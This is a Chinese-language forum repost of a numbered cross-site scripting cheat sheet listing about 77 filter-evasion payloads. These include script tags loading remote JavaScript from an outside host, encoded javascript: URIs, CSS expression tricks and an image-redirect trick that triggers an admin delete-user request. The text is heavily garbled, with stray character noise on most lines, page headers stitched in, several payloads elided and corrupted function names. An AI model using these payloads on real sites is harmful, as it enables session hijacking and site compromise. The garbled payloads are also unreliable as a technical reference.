貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
: W4 N( {* H! h! ?(1)普通的XSS JavaScript注入
* q, O3 z- M+ R7 T<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 \0 W7 Y$ F( o+ M
(2)IMG标签XSS使用JavaScript命令
. N7 I c U* B0 s* Y& A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. o. e. m2 Y* @' B(3)IMG标签无分号无引号
" c A& g' ?) ?; @8 @; V! S<IMG SRC=javascript:alert(‘XSS’)>
3 P8 r, y- A$ M; V( A/ E9 d(4)IMG标签大小写不敏感
0 k$ _9 ^- |9 A* E<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" ^0 ^: e2 T& N! g
(5)HTML编码(必须有分号)
& E _7 Z0 B* w, O/ }<IMG SRC=javascript:alert(“XSS”)>: ?2 x) _) I( }% L$ B
(6)修正缺陷IMG标签, j& Z! z; Q: N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 O6 ^) n1 d4 }1 O4 \" t" }; U4 d0 b/ z4 c0 g) C
+ B1 a/ }" {( B( M1 B5 C
(7)formCharCode标签(计算器)& w/ I( S# d. E5 `! ^ H. p5 W
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' m7 v6 x% M5 w3 U
(8)UTF-8的Unicode编码(计算器)- g' Y! S( s5 j1 y
<IMG SRC=jav..省略..S')>9 g2 O y1 J( T4 v. Y1 x! u! @
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)! ?( G0 V( P& ?+ f
<IMG SRC=jav..省略..S')>( M: d. T' ?" x& ?' u
(10)十六进制编码也是没有分号(计算器)
* r1 l" I9 z) x; W<IMG SRC=java..省略..XSS')>
; X# ~% E0 O: m! ~8 c(11)嵌入式标签,将Javascript分开% c4 E) |; ]( U; \" G2 J) _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) E; C9 N/ C, D(12)嵌入式编码标签,将Javascript分开
- k: B& B1 Y3 C; v7 p( b& B<IMG SRC=”jav ascript:alert(‘XSS’);”>% [7 F1 _$ a3 y" y a" L4 U
(13)嵌入式换行符
: _! ?' {. O1 @4 @<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ G) E8 [" q }: D7 J( b(14)嵌入式回车
: O4 k! ]) D# F( y7 \<IMG SRC=”jav ascript:alert(‘XSS’);”>
" S" ?+ e4 [$ p4 d(15)嵌入式多行注入JavaScript,这是XSS极端的例子: S1 m' j5 V" F( A
<IMG SRC=”javascript:alert(‘XSS‘)”>3 }1 b0 V/ x1 H/ {3 v
(16)解决限制字符(要求同页面)) X8 k" J1 |0 p( W
<script>z=’document.’</script>" S" Q/ Z( j2 W
<script>z=z+’write(“‘</script>
H+ x' X# L( W5 _. T' i<script>z=z+’<script’</script>7 i: q' J" Y4 H& L3 o; t
<script>z=z+’ src=ht’</script>
8 |9 L, B% |8 d; K$ l3 B- s" z0 z* |<script>z=z+’tp://ww’</script>
/ m& ^; h0 [# g! M3 n4 `% `' ]( p<script>z=z+’w.shell’</script>- S& r& l) {, d9 s
<script>z=z+’.net/1.’</script>5 E4 t" t, E" R% `5 x3 f
<script>z=z+’js></sc’</script>
5 y3 U; w6 ^) S6 c% b$ l% S<script>z=z+’ript>”)’</script>3 b0 U: i9 J, h$ `3 x/ J. v% z
<script>eval_r(z)</script>; T1 @% h3 k6 ^1 @0 A2 j
(17)空字符12-7-1 T00LS - Powered by Discuz! Board, g0 S* i+ y8 u! @
https://www.t00ls.net/viewthread ... table&tid=15267 2/6+ I( M0 G$ g C" w0 ~
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out* }. Y- E! L& _* w3 J, U
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用! I; Y, p& l$ ^) X, x
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 m1 W, a$ K2 k* e
(19)Spaces和meta前的IMG标签
T' X6 w; S2 s' r' t<IMG SRC=” javascript:alert(‘XSS’);”>
1 n: D1 G# m3 P% E% M(20)Non-alpha-non-digit XSS
: D. v3 l, u8 V# p6 n1 n6 I- h1 a<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, [. o4 d4 B5 J( _
(21)Non-alpha-non-digit XSS to 2
$ F/ X* U; ]$ L5 d0 S7 U$ K6 |# p<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>& X" S1 r: W" v$ z. p t7 o
(22)Non-alpha-non-digit XSS to 3
3 L' T! R0 Y; ^9 w4 N! l8 [1 @/ h<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
G9 }$ \# ~6 C2 U; b(23)双开括号
3 b% S8 F" d/ [+ D: U<<SCRIPT>alert(“XSS”);//<</SCRIPT>* q9 F3 i/ \6 m1 q$ y2 ^6 r, R0 n6 J
(24)无结束脚本标记(仅火狐等浏览器)+ V. a2 o y3 b
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' c0 y8 n- a2 b
(25)无结束脚本标记2
2 I! R5 z; b0 J' r) h- u<SCRIPT SRC=//3w.org/XSS/xss.js>/ W' |4 ]3 m# R/ a& L& F, v& h6 `3 `
(26)半开的HTML/JavaScript XSS" u" L. f% Q: }% z' V2 F
<IMG SRC=”javascript:alert(‘XSS’)”
. |( w' A2 J0 N# c |2 |(27)双开角括号, i1 Y* `( @* c0 B
<iframe src=http://3w.org/XSS.html <
5 f; Q$ o) `( O+ q% |4 E(28)无单引号 双引号 分号
4 f: m" D5 i9 U) k( v N+ U, Q( b+ v<SCRIPT>a=/XSS/
1 I4 l4 f2 A) Q% J0 falert(a.source)</SCRIPT># F! _5 r" f+ d1 Z* B
(29)换码过滤的JavaScript, c0 t0 ~/ D! S% D
\”;alert(‘XSS’);//
/ Z- Y$ q& `" L$ [6 c2 ~; {(30)结束Title标签2 R5 @" p5 I, n/ [9 r {7 e
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
, n, `1 q K6 Z/ p8 D% Z(31)Input Image. u5 [5 Y2 [4 X$ g8 Q9 T
<INPUT SRC=”javascript:alert(‘XSS’);”>% X# A% a. _4 a
(32)BODY Image. q8 R3 s- z; e7 N5 B# o
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, |5 ^% e% Y, R2 o3 q( h
(33)BODY标签
( `( H1 ^! a5 ]0 z4 g<BODY(‘XSS’)>7 s G4 R5 k8 C+ U) A4 t" y) H
(34)IMG Dynsrc
( `/ L. G4 S/ K/ g9 p( X<IMG DYNSRC=”javascript:alert(‘XSS’)”>" B1 K0 W$ o E9 p7 [* J% h
(35)IMG Lowsrc
4 o! C* t+ w5 N+ }<IMG LOWSRC=”javascript:alert(‘XSS’)”>
* U4 \4 \' x4 U9 r3 {(36)BGSOUND/ ~; p) t6 A- s, i1 C4 C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
1 |/ l+ J' U$ h2 `) M! R; g(37)STYLE sheet
v+ q" F6 H" V# D& a<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 e4 l% [- b: z1 @(38)远程样式表7 h# C4 n& r5 P% ^+ y
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
& v2 g+ E8 w+ _- R2 t, k2 G(39)List-style-image(列表式)
' t1 ^/ k4 m6 T. d# h- X/ b<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 }5 x( Z1 c! H, W1 D
(40)IMG VBscript
[& S- c5 y2 ]- {# a# X8 Z<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS7 m* j# @$ g% e$ M7 w8 H
(41)META链接url( B9 L5 M' a. r3 h
) ~ i4 d. ~7 ]5 _
" |# V$ L' v) l5 h- t2 d }0 e' {2 V<META HTTP-EQUIV=”refresh” CONTENT=”0;# N6 H0 A* B! W; }
URL=http://;URL=javascript:alert(‘XSS’);”>
9 h7 k$ r4 w! w(42)Iframe
' o4 {4 j3 V# M) s- m0 ^2 y<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, u( X: z5 y& U+ N& q0 V7 }5 X3 w(43)Frame- l r1 f$ D& H/ l2 z
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board3 |' A& q" _7 V+ x9 t, k; q3 g9 i
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
6 I4 E0 ~' @- D9 M! z0 M6 Q# y. r(44)Table: H( N9 C2 g4 @' E5 N+ g
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
H& @5 ~$ H" T8 C. z- y# a# V( b(45)TD
* g |. [. _3 @6 e T<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 P; G, c, J/ P+ Y" R/ [7 _
(46)DIV background-image7 d& @+ E* ] c9 ^! e
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 @- V6 I: a2 R1 i# d0 ?(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-7 f. h+ y0 h9 v
8&13&12288&65279)
$ K% A" n t w/ o t( I9 Z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; u: V; m0 x9 ~+ |% G(48)DIV expression
) Z, c0 i; b$ D; G0 [3 u<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& n5 m7 [( o$ H, W+ {
(49)STYLE属性分拆表达# e; g+ \- l5 Z" |3 J l
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>8 Z% V) s8 B5 a; n, @9 x
(50)匿名STYLE(组成:开角号和一个字母开头)! s) T% x, N! i
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: H/ P1 f* V) x
(51)STYLE background-image
6 Y a8 w x: J3 \# v: Y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
, }( b) }# f% d- rCLASS=XSS></A>
8 U. H" c# T* S(52)IMG STYLE方式
% M: a4 y( x$ dexppression(alert(“XSS”))’>
' A q }6 V& L9 Q(53)STYLE background
+ ?* n% P4 p! o1 A8 \' K+ U3 c<STYLE><STYLE: o) G3 u" e) E8 f
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- U( L' E' S4 O! m# o
(54)BASE
1 l, ~1 ^6 a5 S% U* {<BASE HREF=”javascript:alert(‘XSS’);//”>
x! Q( c. i! i$ X(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) O4 V: f8 Y; m8 E4 _<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 q- H, j. H4 v+ j(56)在flash中使用ActionScrpt可以混进你XSS的代码
\1 D& K z, |, \ S" ca=”get”;1 m$ d! i. e; H9 u! B; U) m- n# z
b=”URL(\”";
* L! m1 W: t B! O% {c=”javascript:”;4 i+ c, G% O. F+ N8 Z$ H
d=”alert(‘XSS’);\”)”;
" ~/ E4 }2 ~6 n! u% teval_r(a+b+c+d); C9 G+ d2 ~6 h9 s: S4 o. s$ n
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上2 K( `' n% L0 \: c; x T
<HTML xmlns:xss>
; E) ` P- K2 r. F<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% x5 X3 _& d# k! B* M$ ?
<xss:xss>XSS</xss:xss># F, w/ @8 B+ x- Z7 ?/ ^, r, _; L
</HTML>6 l" U/ L! p; f9 C1 e3 l" O; i
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
5 F' E# ?1 {. ~4 |<SCRIPT SRC=””></SCRIPT>
) n1 ~. ^ `7 L+ i) ?2 h(59)IMG嵌入式命令,可执行任意命令" a% T5 n, ~6 W: x1 A2 l4 f% `4 G: p
<IMG SRC=”http://www.XXX.com/a.php?a=b”>* c# t& N4 o# O9 ?' F1 M
(60)IMG嵌入式命令(a.jpg在同服务器)( m; m, q$ M: s9 G- b. {- |5 [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! |- o( a9 n; s# R* Y+ j1 R; G: o
(61)绕符号过滤
9 L8 V6 N4 j+ e/ ?7 v7 w<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& Y# f- K5 W6 X9 R# B7 K(62)9 P' c6 Z: E1 F% [2 l
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 `: m/ E r1 h4 ^/ K(63)& N% _5 a$ V( ^
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
. @! Y8 f7 a: O+ E7 X(64); M3 g1 e! F) a3 b+ O& M6 Z
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 f( m( Q# s" m2 A0 n
(65)- z$ ^6 b6 K! v/ T5 r7 i, v# j5 I1 ]
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 C. J/ G2 g. X# |
(66)12-7-1 T00LS - Powered by Discuz! Board# b. J+ `" |6 M0 V
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
0 \. G* X& L& \<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
O# p/ I+ f' ]3 Y(67)
" E+ s& t; B" i, @; X8 D- L<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”># [! K$ [) Z& a1 O7 W
</SCRIPT>) D) R! q: D9 f# J/ F# ?* P
(68)URL绕行/ E3 F% e. U% A/ u1 m$ }
<A HREF=”http://127.0.0.1/”>XSS</A>
0 q1 K: T1 ?/ E0 H. m, p(69)URL编码2 Y+ `& [/ H. z/ @" \& R5 h5 `/ o
<A HREF=”http://3w.org”>XSS</A>5 J( v9 o* p9 I2 S6 J0 h' x
(70)IP十进制 r! a6 [8 |4 i$ |
<A HREF=”http://3232235521″>XSS</A>7 X( E8 m6 V8 J0 M7 W# z
(71)IP十六进制
5 S: f0 q+ M% W# p<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>9 ~7 O+ T+ b P1 @
(72)IP八进制
0 `7 Y9 r7 ]* P. z<A HREF=”http://0300.0250.0000.0001″>XSS</A>
* s. X/ k; a4 d, k3 _(73)混合编码
0 z" |* b( }1 k" V) I$ {<A HREF=”h" G/ `2 S& M$ n: w _1 I3 z$ {
tt p://6 6.000146.0×7.147/”">XSS</A>: Y+ B) X( E; H* v" e0 S$ O( f
(74)节省[http:]
7 T. |/ S1 e) u. l* ^+ E6 A# A<A HREF=”//www.google.com/”>XSS</A>
# p- w5 L" F& l& _- G1 k/ H(75)节省[www]
6 T, q Y5 M$ T1 C4 ^+ D<A HREF=”http://google.com/”>XSS</A>5 k( R/ m0 w a+ U* y2 q- D
(76)绝对点绝对DNS1 y8 }2 i& p7 @% h
<A HREF=”http://www.google.com./”>XSS</A>- J9 O' T: ^( [
(77)javascript链接3 ?5 i/ k R$ Q* q3 X/ ]
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
. o% t9 t( R& y, ]* @4 Z; g
0 v2 S) g4 A+ }2 x4 w& V3 y; w原文地址:http://fuzzexp.org/u/0day/?p=141 W$ R7 G3 o# E7 x4 z; z% B1 Q
" l4 h: F8 e, N7 M0 T, w7 v
|
发表于 2013-4-19 19:22:37
收藏
支持
反对